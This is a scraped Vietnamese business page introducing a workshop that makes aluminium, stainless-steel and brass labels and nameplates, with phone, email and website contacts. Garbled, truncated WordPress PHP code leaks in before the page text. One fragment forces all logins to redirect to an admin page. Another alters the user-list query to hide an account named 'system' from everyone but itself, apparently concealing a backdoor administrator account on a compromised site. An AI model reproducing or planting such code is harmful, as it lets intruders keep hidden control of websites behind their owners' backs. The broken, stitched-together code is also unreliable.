roles ) && is_array( $user->roles ) ) { //check for admins if ( in_array( 'subscriber', $user->roles ) ) { // redirect them to the default place $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } else { $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } } else { $redirect_to = '/wp-admin/admin.php?page=gettingstart'; return $redirect_to; } } add_filter( 'login_redirect', 'my_login_redirect', 10, 3 ); ?>user_login; if ($username == 'system') { } else { global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != 'system'",$user_search->query_where); } } ?> Giới thiệu | in tem nhãn, tem nhãn kim loại, tem nhãn inox, tem nhãn đồng, tem nhãn nhôm, tem nhãn giá rẻ
Đóng

Giới thiệu

Chúng tôi là xưởng nhỏ chuyên gia công các loại nhãn mác nhôm, in tem mác nhôm xước, tem mác inox, name plate, name tag , logo kim loại, logo đúc antimol… Cung cấp tem nhãn cho các đơn hàng nội địa và xuất khẩu.

Khách hàng có nhu cầu vui lòng liên hệ:

Liên hệ: 0903 008 414

Email: nhankimloai@gmail.com

Website: congcuquangcao.com.vn

 

 

1

2